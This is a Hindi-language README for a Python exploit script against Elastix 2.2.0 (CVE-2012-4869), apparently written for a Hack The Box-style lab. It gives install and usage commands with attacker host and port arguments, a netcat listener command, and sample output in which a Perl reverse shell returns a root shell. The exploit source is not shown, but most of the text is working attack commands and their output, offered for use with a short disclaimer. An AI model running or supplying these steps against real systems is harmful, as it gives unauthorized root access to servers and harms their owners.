
Python exploit स्क्रिप्ट Elastix 2.2.0 LFI भेद्यता (CVE-2012-4869) के लिए, जो Perl रिवर्स शेल पेलोड इंजेक्शन के माध्यम से रिमोट कोड निष्पादन सक्षम करती है।
यह स्क्रिप्ट Elastix 2.2.0 में एक लोकल फ़ाइल इन्क्लूज़न (LFI) भेद्यता का शोषण करती है, जो callme_page.php एंडपॉइंट के माध्यम से कमांड इंजेक्ट करके रिमोट कोड निष्पादन (RCE) की अनुमति देती है। यह एक्सप्लॉइट CVE-2012-4869 पर आधारित है।
requests मॉड्यूलनिर्भरताएँ स्थापित करें:
pip install requests
python exploit.py <URL> --LHOST <YOUR_IP> --LPORT <YOUR_PORT>
python exploit.py "https://10.129.229.183" --LHOST "10.10.14.23" --LPORT 9001
एक्सप्लॉइट चलाने से पहले, अपनी मशीन पर Netcat लिसनर शुरू करें:
nc -lvnp 9001
[*] Running Elastix 2.2.0 LFI Exploit - CVE-2012-4869
[*] Target: https://10.129.229.183
[*] Listening on 10.10.14.23:9001
[+] Exploit sent successfully, waiting for reverse shell...
[+] Connection from 10.129.229.183:41242
$ id
uid=0(root) gid=0(root) groups=0(root)
यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। अनधिकृत उपयोग अवैध है। लेखक इस उपकरण के दुरुपयोग के लिए ज़िम्मेदार नहीं है।